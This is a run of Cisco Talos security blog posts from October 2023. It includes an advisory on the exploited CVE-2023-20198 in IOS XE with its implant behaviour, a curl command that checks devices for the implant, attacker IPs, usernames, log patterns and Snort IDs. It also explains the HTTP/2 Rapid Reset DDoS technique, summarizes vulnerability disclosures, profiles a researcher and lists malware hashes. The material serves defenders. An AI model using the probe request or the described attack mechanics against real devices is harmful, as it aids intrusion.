Cisco has identified active exploitation of a previously unknown vulnerability in the Web User Interface (Web UI) feature of Cisco IOS XE software (CVE-2023-20198) when exposed to the internet or untrusted networks.

Monday, October 16, 2023 11:10

**Overview **

*   Cisco has identified active exploitation of a previously unknown vulnerability in the Web User Interface (Web UI) feature of Cisco IOS XE software (CVE-2023-20198) when exposed to the internet or untrusted networks. This affects both physical and virtual devices running Cisco IOS XE software that also have the HTTP or HTTPS Server feature enabled.  
*   Successful exploitation of this vulnerability allows an attacker to create an account on the affected device with privilege level 15 access, effectively granting them full control of the compromised device and allowing possible subsequent unauthorized activity.  
*   The recommendation that Cisco has provided in its security advisory to disable the HTTP server feature on internet-facing systems is consistent with not only best practices but also guidance the U.S. government has provided in the past on mitigating risk from internet-exposed management interfaces.  
*   Cisco support centers collaborated with the security team after using methods and procedures to correlate similar indicators in a very small number of cases out of our normal substantial daily case volume.  
*   This is a **critical vulnerability**, and we strongly recommend affected entities immediately implement the steps outlined in Cisco’s PSIRT advisory. 

**Cisco identifies suspicious activity **

We discovered early evidence of potentially malicious activity on September 28, 2023, when a case was opened with Cisco's Technical Assistance Center (TAC) that identified unusual behavior on a customer device. Upon further investigation, we observed what we have determined to be related activity as early as September 18. The activity included an authorized user creating a local user account under the username “cisco\_tac\_admin” from a suspicious IP address (5.149.249\[.\]74). Instances of this activity ended on October 1, and we did not observe any other associated behavior at that time other than the suspicious account creation.  

On October 12, Cisco Talos Incident Response (Talos IR) and TAC detected what we later determined to be an additional cluster of related activity that began on that same day. In this cluster, an unauthorized user was observed creating a local user account under the name “cisco\_support” from a second suspicious IP address (154.53.56\[.\]231). Unlike the September case, this October activity included several subsequent actions, including the deployment of an implant consisting of a configuration file (“cisco\_service.conf”). The configuration file defines the new web server endpoint (URI path) used to interact with the implant. That endpoint receives certain parameters, described in more detail below, that allows the actor to execute arbitrary commands at the system level or IOS level. For the implant to become active, the web server must be restarted; in at least one observed case the server was not restarted so the implant never became active despite being installed. 

The implant is saved under the file path “/usr/binos/conf/nginx-conf/cisco\_service.conf” that contains two variable strings made up of hexadecimal characters. The implant is not persistent—meaning a device reboot will remove it—but the newly created local user accounts remain active even after system reboots. The new user accounts have level 15 privileges, meaning they have full administrator access to the device. This privileged access to the devices and subsequent creation of new users is tracked as CVE-2023-20198. 

We assess that these clusters of activity were likely carried out by the same actor. Both clusters appeared close together, with the October activity appearing to build off the September activity. The first cluster was possibly the actor’s initial attempt and testing their code, while the October activity seems to show the actor expanding their operation to include establishing persistent access via deployment of the implant. 

**Initial access **

The new CVE-2023-20198 vulnerability received the highest Common Vulnerability Scoring System (CVSS) score (10/critical). Successful exploitation would grant an attacker full administrator privileges, allowing them to effectively take full control of the affected router and allowing possible subsequent unauthorized activity. 

**Implant delivery **

Leveraging existing detections, we observed the actor exploiting CVE-2021-1435, for which Cisco provided a patch in 2021, to install the implant after gaining access to the device. We have also seen devices fully patched against CVE-2021-1435 getting the implant successfully installed through an as of yet undetermined mechanism. 

**Implant analysis **

The implant is based on the Lua programming language and consists of 29 lines of code that facilitates the arbitrary command execution. The attacker must create an HTTP POST request to the device, which delivers the following three functions (Figure 1): 

1.  The first function is dictated by the “menu” parameter, which must exist and must be non-empty. This returns a string of numbers surrounded by forward-slashes, which we suspect might represent the implant’s version or installation date. 

2.  The second function is dictated by the “logon\_hash” parameter, which must be set to “1”. This returns an 18-character hexadecimal string that is hardcoded into the implant. 

3.  The third function is also dictated by the “logon\_hash” parameter, which checks to see if the parameter matches a 40-character hexadecimal string that is hardcoded into the implant. A second parameter used here is “common\_type”, which must be non-empty, and whose value determines whether the code is executed at the system level or IOS level. If the code is executed at the system level, this parameter must be set to “subsystem”, and if it is executed at the IOS level, the parameter must be “iox”. The IOX commands are executed at privilege level 15.  

Figure 1: Implant code 

In most instances we have observed of this implant being installed, both the 18-character hexadecimal string in the second function and the 40-character hexadecimal string in the third function are unique, although in some cases, these strings were the same across different devices. This suggests there is a way for the actor to compute the value used in the third function from the value returned by the second function, acting as a form of authentication required for the arbitrary command execution provided in the third function. 

**Guidance and mitigation **

We strongly recommend organizations that may be affected by this activity immediately implement the guidance outlined in Cisco’s Product Security Incident Response Team (PSIRT) advisory. 

Organizations should look for unexplained or newly created users on devices as evidence of potentially malicious activity relating to this threat. One method to identify if the implant is present is to run the following command against the device, where the "DEVICEIP” portion is a placeholder for the IP address of the device to check:  

curl -k -X POST "https\[:\]//DEVICEIP/webui/logoutconfirm.html?logon\_hash=1" 

Note: The above check should use the HTTP scheme if the device is only configured for an insecure web interface. 

This will execute a request to the device’s Web UI to see if the implant is present. If the request returns a hexadecimal string, similar to what was outlined in the third function above, the implant is present. We note this will only work as an indication of compromise if the web server was restarted by the actor after the implant was installed.  

We also have the following Snort coverage to address this threat. The first Snort ID is an older rule that covers CVE-2021-1435, and the last three alert if interaction with the implant occurs:  

*   **3:50118:2**  
*   **3:62527:1** 
*   **3:62528:1** 
*   **3:62529:1**  

The recommendation that Cisco has provided in its security advisory to disable the HTTP/S server feature on internet-facing systems is consistent with best practices and also guidance the U.S. government has provided in the past on mitigating risk from internet-exposed management interfaces. This is also in line with Cisco’s ongoing work with industry partners as part of the Network Resilience Coalition. 

Cisco support centers collaborated with the security team after using methods and procedures to correlate similar indicators in a very small number of cases out of our normal substantial daily case volume. 

**IOCs **

5.149.249\[.\]74 

154.53.56\[.\]231 

**Usernames:** 

cisco\_tac\_admin 

cisco\_support 

In addition to the curl command referenced above, perform the following checks to determine whether a device may have been compromised: 

1.  Check the system logs for the presence of any of the following log messages where “user” could be “cisco\_tac\_admin”, “cisco\_support” or any configured, local user that is unknown to the network administrator: 

%SYS-5-CONFIG\_P: Configured programmatically by process SEP\_webui\_wsma\_http from console as user on line

%SEC\_LOGIN-5-WEBLOGIN\_SUCCESS: Login Success \[user: user\] \[Source: source\_IP\_address\] at 03:42:13 UTC Wed Oct 11 2023

Note: The %SYS-5-CONFIG\_P message will be present for each instance that a user has accessed the web UI. The indicator to look for is new or unknown usernames present in the message. 

2.  Check the system logs for the following message where **filename** is an unknown filename that does not correlate with an expected file installation action:  

%WEBUI-6-INSTALL\_OPERATION\_INFO: User: username, Install Operation: ADD filename

Active exploitation of Cisco IOS XE Software Web Management User Interface vulnerability

Plus, many of the world’s largest cloud providers are warning of a vulnerability that attackers exploited in August to launch the largest distributed denial-of-service attack on record.

Thursday, October 12, 2023 14:10

Welcome to this week’s edition of the Threat Source newsletter. 

I didn’t feel like I wanted to write anything special or witty this week given the current events in Israel and the Gaza Strip, but I will certainly advocate for any assistance readers would like to provide to the various organizations and helpers who are trying to do some good for Israeli and Palestinian civilians right now.  

And since it’s still Cybersecurity Awareness Month, I also wanted to provide some links to various resources, blog posts and podcasts that I’ve found particularly helpful this month and I think you will, too. 

*   Countering the Rise of Ransomware (Cisco YouTube) 
*   Talos APJC Threat Update: How attackers are using AI 
*   The New Normal: How XDR is Tackling Social Engineering in Today’s World (Cisco Secure blog) 
*   CISA’s Secure Our World initiative 
*   Allied Against Hate: CISA resources for faith and community leaders 
*   Fact sheet: Improving Security of Open Source Software in Operational Technology and Industrial Control Systems 

**The one big thing **

Many of the world’s largest cloud providers are warning of a vulnerability that attackers exploited in August to launch the largest distributed denial-of-service attack on record. CVE-2023-44487, a vulnerability in the HTTP/2 protocol, was recently used to launch intensive DDoS attacks against several targets. The problem lies in the way that HTTP/2 protocol handles request cancellations or resets. When a client issues a reset for an HTTP/2 request, this consumes resources on the server as it cancels the corresponding stream. However, after issuing a reset, the client can instantly open a new stream. 

**Why do I care? **

Google said the attack in August was the heaviest DDoS assault it ever recorded at over 398 million requests per second, which the company said is more than seven times larger than any other its ever recorded. So, the sheer scale is certainly notable. If this type of attack was launched with a much larger botnet, the traffic volume could be orders of magnitude greater and have a much larger potential impact. As such, organizations are urged to patch or mitigate as quickly as possible. 

**So now what? **

Users of any products using the vulnerable protocol — individual companies like F5 and Microsoft have released individual advisories about anything that was affected — should make sure patches are implemented immediately. However, this issue is largely about appropriate DDoS mitigation techniques on your environment. A newly released Snort rule, SID 62519, can detect activity associated with this vulnerability.  

**Top security headlines of the week **

**Attackers have published the personal information of almost one million people who have Ashkenazi Jew heritage** after the adversaries breached genetic testing service 23AndMe. The list allegedly includes full names, sex and 23AndMe’s data on where their ancestry stems from. As of Wednesday morning, the company was still investigating the attackers’ claims but assumed it was authentic. Customers can learn more about their family’s heritage by providing identification data, health information, phenotype, photos and more to 23AndMe. A security researcher said the information looked authentic, and that it’s a sign that a data breach can be dangerous, even if attackers don’t end up manually breaking into a deeper layer of the network. (The Record by Recorded Future 23andMe scraping incident leaked data on 1.3 million users of Ashkenazi and Chinese descent)  

**Microsoft patched more than 100 vulnerabilities in its range of products as part of its monthly security update.** This batch included two zero-day vulnerabilities that had already been exploited in the wild and nine critical issues in the Layer 2 tunneling protocol. Meanwhile, Apple also released a security update Tuesday to fix two critical vulnerabilities in its iOS mobile operating system that were also being exploited in the wild. CVE-2023-42724 in iOS and iPadOS, has been exploited by attackers to elevate their access on a local device. Back on the Microsoft side, the company also used Patch Tuesday as an opportunity to fix security holes in their products related to the high-profile HTTP/2 protocol used to launch massive, distributed denial-of-service (DDoS) attacks earlier this year. (Talos, Krebs on Security) 

The International Committee of the Red Cross published new guidelines this week, **hoping hacktivist groups will follow during wartime to avoid affecting critical infrastructure and everyday civilians.** An increasing number of civilian hackers have become involved in international conflicts hoping to make a difference, especially in the Russia-Ukraine war and now again in Israel. The Red Cross’ new guidelines urge these groups and individuals to obey national laws, if appropriate, and follow the same set of rules for kinetic warfare that international humanitarian law (IHL) provides, and which are aimed at safeguarding “civilians, and soldiers who are no longer able to fight, from some of the horrors of war.” Some of the objectives put forth include not targeting civilian objectives, deploying any malware that may target military and civilian targets indiscriminately and adhering to these rules even if the enemy does not. (Washington Post, SecurityWeek). 

**Can’t get enough Talos? **

*   Talos Takes Ep. #157: Cybersecurity Awareness Month: The best practices for implementing multi-factor authentication 
*   Qakbot hackers now pushing Cyclops/Ransom Knight ransomware, Cisco says 
*   Qakbot hackers are still spamming victims despite FBI takedown 
*   Qakbot Attackers Remain Alive and Quacking, Researchers Find 
*   Researcher Spotlight: How looking at decades of spam led Jaeson Schultz from Y2K to the metaverse and cryptocurrency 
*   Vulnerability Roundup: 10 zero-day vulnerabilities in industrial cell router could lead to code execution, buffer overflow 

**Upcoming events where you can find Talos **

**ATT&CKcon 4.0** **(Oct. 24 - 25)** 

_McLean, Virginia_ 

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking. 

**misecCON** **(Nov. 17)** 

_Lansing, Michigan_ 

> Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines. 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256: d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827**  
**MD5:** bf357485cf123a72a46cc896a5c4b62d  
**Typical Filename:** bf357485cf123a72a46cc896a5c4b62d.virus  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:d5219579ee.in03.Talos

**SHA 256: 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa**   
**MD5:** 9403425a34e0c78a919681a09e5c16da   
**Typical Filename:** vincpsarzh.exe   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd 

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440   
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e   
**Typical Filename:** iizbpyilb.bat   
**Claimed Product:** N/A    
**Detection Name:** Trojan.Agent.DDOH 

**SHA 256:** 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa   
**MD5:** e9a6b1346d1a2447cabb980f3cc5dd27   
**Typical Filename:** профиль 10 класс.exe   
**Claimed Product:** N/A   
**Detection Name:** Application\_Blocker

Top resources for Cybersecurity Awareness Month

Cisco Talos is actively tracking the novel distributed denial-of-service (DDoS) attacks cloud services provider Cloudflare disclosed earlier this week. The techniques described in Cloudflare’s blog post resulted in a record-breaking DDoS attack and could facilitate much larger attacks in the future. 
CVE-2023-44487
CVE-2023-44487, a vulnerability in the

Wednesday, October 11, 2023 19:10

Cisco Talos is actively tracking the novel distributed denial-of-service (DDoS) attacks cloud services provider Cloudflare disclosed earlier this week. The techniques described in Cloudflare’s blog post resulted in a record-breaking DDoS attack and could facilitate much larger attacks in the future. 

**CVE-2023-44487**

CVE-2023-44487, a vulnerability in the HTTP/2 protocol, was recently used to launch intensive DDoS attacks against several targets. The problem lies in the way that HTTP/2 protocol handles request cancellations or resets. When a client issues a reset for an HTTP/2 request, this consumes resources on the server as it cancels the corresponding stream. However, after issuing a reset, the client can instantly open a new stream. The rapid opening and canceling of the HTTP/2 streams is what causes the denial of service. Because HTTP/2 has been integrated into a variety of different web platforms, it is likely that this vulnerability will have a widespread impact.

HTTP/2 made improvements over previous versions of the HTTP protocol, including changing the ways HTTP requests were handled. Earlier versions of HTTP rely on request-response serialization, in which a client sends a request to a server and then receives a response from that server over the same TCP connection. HTTP/2, meanwhile, formats requests and responses into HTTP/2 frames. Each frame has its own stream ID, used to identify which requests and responses correspond with each other. This allows for multiplexing and concurrent requests. This design is much more in line with the way web traffic occurs today, typically requiring large amounts of asynchronous requests for various types of data as web pages load. 

However, this new mechanism is where the denial-of-service vulnerability lies. Attackers have discovered that, by creating large amounts of requests and resets in a short period of time, they can consume valuable resources on HTTP/2 servers, resulting in a denial of service. The challenge is that when viewing certain types of web pages, large amounts of these requests are expected. This can also include some resets if the user is quickly scrolling through a page to speed up the rendering of the images ahead, for example. The other compounding factor is that there is a hard limit to the amount of concurrent connections HTTP/2 servers can support. According to RFC 9113, it is recommended that the SETTINGS\_MAX\_CONCURRENT\_STREAMS for an HTTP/2 server be no smaller than 100, “so as to not unnecessarily limit parallelism.” If an attacker with a large number of systems under their control can fill up these connection pools with open or half-open HTTP/2 connections the HTTP/2 server can be overwhelmed.

This is exactly what has been occurring at Cloudflare and other large providers. Beginning in late August, these networks started seeing large-scale DDoS attacks leveraging this novel technique eventually peaking at more than 200 million requests a second, accomplished with a botnet of only 20,000 systems. If this type of attack was launched with a much larger botnet, the traffic volume could be orders of magnitude greater and have a much larger potential impact. As such, organizations are urged to patch or mitigate as quickly as possible.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort SIDs:  
62519

What to know about the HTTP/2 Rapid Reset DDoS attacks

Attackers could exploit these vulnerabilities in the Yifan YF325 to carry out a variety of attacks, in some cases gaining the ability to execute arbitrary shell commands on the targeted device.

Wednesday, October 11, 2023 12:10

Cisco Talos recently disclosed 11 vulnerabilities, 10 of which are zero-days without a patch in an industrial cellular router. 

Attackers could exploit these vulnerabilities in the Yifan YF325 to carry out a variety of attacks, in some cases gaining the ability to execute arbitrary shell commands on the targeted device.  

The one other security issue Talos has disclosed over the past two weeks is a use-after-free vulnerability in an open-source port of WebKit, a popular content rendering engine used in popular web browsers like Apple Safari. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Yifan YF325 **

_Discovered by Francesco Benvenuto._ 

The Yifan YF325 is a cellular terminal device that offers Wi-Fi and ethernet connectivity capabilities to a network.  

The company’s website says the YF325, “has been widely used on M2M fields, such as self-service terminal industry, intelligent transportation, smart grid, industrial automation, telemetry, finance, POS, water supply, environment protection, post, weather, and so on.” 

Talos recently discovered 10 vulnerabilities in this device an adversary could exploit to carry out a variety of malicious actions, including TALOS-2023-1767 (CVE-2023-32632), which could allow an attacker to execute arbitrary shell commands on the targeted device. 

TALOS-2023-1762 (CVE-2023-24479) is perhaps the most serious of the set of vulnerabilities with a CVSS severity score of 9.8 out of 10. An attacker could exploit this vulnerability to change the admin credentials of the device and obtain root access. TALOS-2023-1752 (CVE-2023-32645) is also an authentication bypass vulnerability, but in this case, an attacker could simply use leftover debug credentials to log in as an administrator. 

The remaining vulnerabilities Talos disclosed in this product this week are buffer overflow vulnerabilities all triggered by specially crafted network requests: 

*   TALOS-2023-1761 (CVE-2023-35055 and CVE-2023-35056) 
*   TALOS-2023-1763 (CVE-2023-34365) 
*   TALOS-2023-1764 (CVE-2023-34346) 
*   TALOS-2023-1765 (CVE-2023-31272) 
*   TALOS-2023-1766 (CVE-2023-34426) 
*   TALOS-2023-1787 (CVE-2023-35965 and CVE-2023-35966) 
*   TALOS-2023-1788 (CVE-2023-35967 and CVE-2023-35968) 

All these vulnerabilities also have a severity score of 9.8. 

Talos is disclosing these vulnerabilities despite no official patch from Yifan, all in adherence to Cisco’s third-party vendor vulnerability disclosure policy. 

**Use-after-free vulnerability in WebKitGTK **

_Discovered by Marcin “Icewall” Noga._ 

Talos recently disclosed a use-after-free vulnerability in WebKitGTK’s MediaRecorder API. 

WebKitGTK is a full-featured, open-source port of the WebKit rendering engine. 

TALOS-2023-1831 (CVE-2023-39928) could lead to remote code execution, if the targeted user opens an attacker-controlled, malicious web page using an application that utilizes the affected version of WebKitGTK.

10 zero-day vulnerabilities in industrial cell router could lead to code execution, buffer overflows

Two other vulnerabilities that Microsoft is fixing Tuesday — CVE-2023-36563 in Microsoft WordPad and CVE-2023-41763 in the Skype communication platform — have already been publicly exploited in the wild and have proof-of-concept code available.

Wednesday, October 11, 2023 07:10

Microsoft disclosed 104 vulnerabilities in its extensive range of software and services, the most in a single Patch Tuesday since July.  

What is most notable is that this batch of vulnerabilities includes 12 that are considered “critical,” nine of which are remote code execution vulnerabilities in the Layer 2 Tunneling Protocol.   

Two other vulnerabilities that Microsoft is fixing Tuesday — CVE-2023-36563 in Microsoft WordPad and CVE-2023-41763 in the Skype communication platform — have already been publicly exploited in the wild and have proof-of-concept code available, making it more likely that attackers will try to exploit unpatched versions of these pieces of software. However, these issues are only considered “important.”  

The nine Layer 2 Tunneling Protocol vulnerabilities all require an attacker to win a race condition. A race condition is when two threads in a piece of code try to reach the same piece of data at the same time, and thus one action must be completed before the other.  

In this scenario, an attacker could exploit the Tunneling Protocol by sending a specially crafted protocol message to a Routing and Remote Access Service (RAS) server, which could lead to remote code execution on the RAS server machine. The vulnerabilities Microsoft disclosed and patched on Tuesday are:  

*   CVE-2023-38166 
*   CVE-2023-41765 
*   CVE-2023-41767 
*   CVE-2023-41768 
*   CVE-2023-41769 
*   CVE-2023-41770 
*   CVE-2023-41771 
*   CVE-2023-41773 
*   CVE-2023-41774 

The Layer 2 Tunneling Protocol allows remote users to connect to a machine, or site-to-site connectivity via a VPN. Vulnerabilities involving VPNs have come under a microscope since the discovery of the VPNFilter malware in 2018 that affected thousands of devices across the globe. 

A vulnerability in Fortinet’s SSL VPN, CVE-2018-13379, topped the U.S. Cybersecurity and Infrastructure Security Agency’s list of the most-exploited vulnerabilities in 2022, despite being disclosed back in 2018. U.S. officials also warned earlier this year of Volt Typhoon, a large APT believed to be backed by China’s government that is targeting networking devices to possibly gain a foothold onto U.S. military networks and critical infrastructure.  

Another critical remote execution vulnerability disclosed Tuesday, CVE-2023-35349, exists in the Microsoft Message Queuing service. An unauthenticated attacker could exploit this vulnerability to execute code on the targeted server. 

However, this vulnerability is only exploitable if the user has Message Queuing enabled. Microsoft stated in its advisory that users should check to see if there is a service running named “Message Queuing” and if TCP port 1801 is listening on the machine. 

One of the other critical vulnerabilities fixed this month is CVE-2023-36718, a remote code execution vulnerability in the Microsoft Virtual Trusted Platform Module. An attacker who exploits this vulnerability could perform a contained execution environment escape.  

The attack complexity is considered “high” and therefore less likely to be exploited, Microsoft said, because exploitation relies on complex memory shaping techniques and the attacker must at least be authenticated as a guest first.  

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62486 - 62493 and 62508 - 62511, and Snort 3 signatures 300719 - 300722.

Microsoft patches 12 critical vulnerabilities, nine of which are in Layer 2 Tunneling Protocol

“I’m completely interested in the creative ways computers can break down,” Schultz jokes.

Monday, October 9, 2023 08:10

At this point in his career, Jaeson Schultz has seen nearly every type of online scam there is to see.

From fake bomb threats at schools, to “sextortion” campaigns, cryptocurrency mining, metaverse and more of the 2010s, to the earliest type of spam emails in the 1990s that promised to protect people from a Y2K meltdown or had the next great penny stock that the recipient needed to jump on asap, Schultz’s security career has spanned more than 25 years now.

At this point, nothing adversaries come up with surprises him, but that doesn’t mean he’s not looking for those surprises.

Schultz, a researcher for the Talos Outreach team focused specifically on email threats and spam, is currently looking to new and emerging technologies and how they play into attackers’ hands, including Web3, the metaverse (including the capital “M” Metaverse from the company Meta), cryptocurrency exchanges and the blockchain.

But his security experience dates back to the early days of email when he took a job with the state government of Nevada performing traditional IT troubleshooting and support. At the time, cybersecurity was not a specialized field, so by working in IT, you already needed to be interested in security, Schultz said.

“At that point, \[cybersecurity\] was more of a hobby for me in the late 80s and early 90s. It wasn’t an established profession, and you couldn’t study it. So, if you were into network administration, you were probably also into security,” he said.

Schultz started pursuing cybersecurity as a hobby, and he even attended some of the first DEF CON conferences, which today is known as one of the largest hacking conferences in the world.

That eventually led him to a job with Brightmail – one of the earliest anti-spam filtering offerings for email — and at the “abuse desk” for another email service provider, where he was tasked with stopping malicious users from sending spam.

At the time, the threats and tactics he saw then were the same as the ones most users get today: They focus heavily on social engineering, trying to trick users into providing personal information, sending money to the attacker or clicking on a malicious link that downloads malware.

Schultz eventually made his way to Cisco through the company’s acquisition of IronPort, which eventually became part of Cisco Talos nearly 10 years ago, where he became part of the Outreach team, conducting more public-facing threat research.

Today, Schultz said attacks are more sophisticated than before thanks to AI language models and years of experience on the attackers’ end. In his earlier career, Schultz said the wildest scam he saw was an email sender claiming to be a time traveler searching for pieces of their time machine, a tactic that (most) users would sniff out quickly in 2023.

“The techniques have evolved over time, but the basic themes have primarily remained the same,” he said.

One of the techniques Schultz is particularly interested in currently is DNS and URL manipulation. He’s written extensively for the Talos blog about how adversaries are using typosquatted domains — attacks in which bad actors use eerily similar URLs to legitimate sites to trick users into visiting an attacker-controlled page. For example, instead of visiting google.com, an attacker may use the domain googie.com in a spam email.

He’s also conducted research into attackers who distort the DNS system. DNS is essentially the backbone of browsing the internet and is what ensures attackers are visiting the page they want to land on — that typing in google.com will take the user to Google.com. Other attackers are using newly released top-level domains like .zip to trick targets into disclosing potentially sensitive files that end in that extension.

Perhaps in one of the more unlikely scenarios, Schultz is also researching how cosmic rays could interfere with network connections and mistakenly send users to the wrong destination.

“I’m completely interested in the creative ways computers can break down,” Schultz jokes.

Many users can feel hopeless when it comes to spam because they’re still getting emails and text messages every day despite the best efforts to research and continued calls to report certain phone numbers, emails or email subjects as spam. But Schultz said he’s driven by the victories he does get along the way.

“There are just so many people out there who are out to commit crimes online. And the number of people who actually get in trouble for committing those crimes is pretty low when you consider how much work goes into cybersecurity,” he said. “It gets under my skin when there are innocent users who get scammed by these people, like what if it was my mom or my grandma? It motivates me to go out there and disrupt their operations.”

Disruption may not even look like directly taking down email servers they’re using or other infrastructure. Even by writing a blog about an actor’s operations or talking to other security researchers at a conference, Schultz said his team’s work can make bad actors’ work more difficult in many ways. Even by just publicly exploiting their tactics, it forces them to change their strategy on the fly.

Schultz’s life doesn’t slow down outside the office, though. He juggles many interests like snow skating during the cooler months. He also owns a home in Ecuador where he likes to get away from the cold at times — Cisco’s work flexibility allows him to work remotely from either location to fit his schedule. Though he did joke his teammates get jealous when he’s working from Ecuador and brings a fresh coconut on a Webex call for a lunchtime drink.

Perhaps his most personal endeavor is running a toy shop in South Lake Tahoe, California with his family. Schultz’s late wife opened the store in 2019 — she wanted to be her own boss after years of having partners in other small business endeavors around the state.

After her death, Schultz said he and his three children wanted to keep the store running so he got more involved on a day-to-day basis. He even gets to put his IT admin hat back on while managing the online storefront and website.

“This was her project, she was always involved in different small businesses around Lake Tahoe, I talked her into buying this toy store so she would be the sole proprietor and not have to answer to anyone else,” Schultz said. “She bought it in 2019, and thankfully it survived the pandemic.”

Since getting more involved at the store, Schultz has gotten into collecting trading cards like Pokemon and the recently released Disney “Lorcana.” Interestingly, he’s interested in collecting real-world goods while the adversaries he typically tracks try to swindle users out of their virtual NFTs.

How looking at decades of spam led Jaeson Schultz from Y2K to the metaverse and cryptocurrency

Plus, Qakbot appears to be still active, despite efforts from the FBI and other international law enforcement agencies to disrupt the massive botnet.

Thursday, October 5, 2023 14:10

Welcome to this week’s edition of the Threat Source newsletter.

It’s Cybersecurity Awareness Month, which means it’s time to hug your nearest defender — they’re probably tired, could be facing burnout or just have had too much coffee today.

What makes the cybersecurity landscape even more fraught right now is that qualified analysts, researchers and security practitioners are having a hard time finding work. Several major security firms have recently experienced layoffs or have shut down entirely, at the same time the community is lamenting about a cybersecurity skills gap and a lack of workers.

I was watching TechCrunch’s “Disrupt” conference last week and I found it interesting that one particular panel was discussing the challenges of hiring in cybersecurity right now, and the host of the panel asked if there is a stigma around hiring workers who had been a part of major breaches or security incidents (think: a SolarWinds employee who may have been working there during the major supply chain attack that targeted their software).

I had no idea this was even a going concern among security hiring managers, and it makes no sense why there would be. So, I started looking through job board postings and security forums and found that many active security job hunters are afraid to list if they worked somewhere during a notable incident. For example, this user on r/cybersecurity asked last year if they should leave a job off their résumé if they worked there when a major data breach occurred, even though they were not directly involved in the breach whatsoever.

And even if they were, who cares?

Sherrod DeGrippo, the director of threat intelligence strategy at Microsoft, had the perfect answer for this on the aforementioned TechCrunch panel. She said that if she sees a prospective employee who worked somewhere during a security “trash fire,” she looks "at that as somebody who has been on the frontlines and been under fire. They know what to do and they've been through it, and I guarantee they have learned from it.”

There has always been a stigma around disclosing data breaches for companies and employees alike, with targets being afraid of negative press or scrutiny that comes from publicly admitting to a data breach or cyber attack.

And I can see why someone wouldn’t want to mention that during a job interview. There could be an inherent “stink” that comes from working somewhere that got owned or had a ton of negative headlines around it, but I feel like that’s a stigma that needs to go away immediately if the security community does have any hope of closing the skills gap.

Anyone who’s been through a major security event, as I know firsthand from talking to many of Talos’ incident responders, always has something to learn — from either a positive or negative experience. It’s the same in every field, too.

When I was a journalist, I can’t say that I never had to issue a correction for a story I wrote or apologize to a source for misquoting them. They were mistakes I had to make as a young professional and learn from. And in this job, I’ve made a fair share of mistakes, too, and probably will make more. The important thing is, that I learn from those mistakes and make changes to my processes going forward to avoid those mistakes.

I would imagine the same would be for any engineer who mistakenly left a vulnerability in some code or downloaded that software update that seemed legitimate but actually was packed with malware.

If you’ve worked in security for long enough, no matter for what company, you’ve been involved in a major security incident. That should not deter someone from hiring you for your next job, and you shouldn’t be leaving this off a résumé.

I am curious to know if this is a real issue or stigma that’s out there, so if you’re a hiring manager or job applicant who’s experienced this, DM us on Twitter!

**The one big thing**

Qakbot appears to be still active, despite efforts from the FBI and other international law enforcement agencies to disrupt the massive botnet. Talos researchers discovered that the threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in which they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails. Notably, this activity appeared to begin before the FBI seized Qakbot infrastructure in late August and has been ongoing since, indicating the law enforcement operation may not have impacted Qakbot operators’ spam delivery infrastructure but rather only their command and control (C2) servers.

**Why do I care?**

Qakbot is one of the largest, most notable malware networks on the landscape currently, so any activity from this group is notable. But it’s particularly noteworthy now that the actor was able to recover so quickly after the FBI’s efforts. This group is still actively sending spam, despite what recent headlines may indicate. Though Talos has not seen the threat actors distributing Qakbot itself post-infrastructure takedown, we assess the malware will continue to pose a significant threat moving forward.

**So now what?**

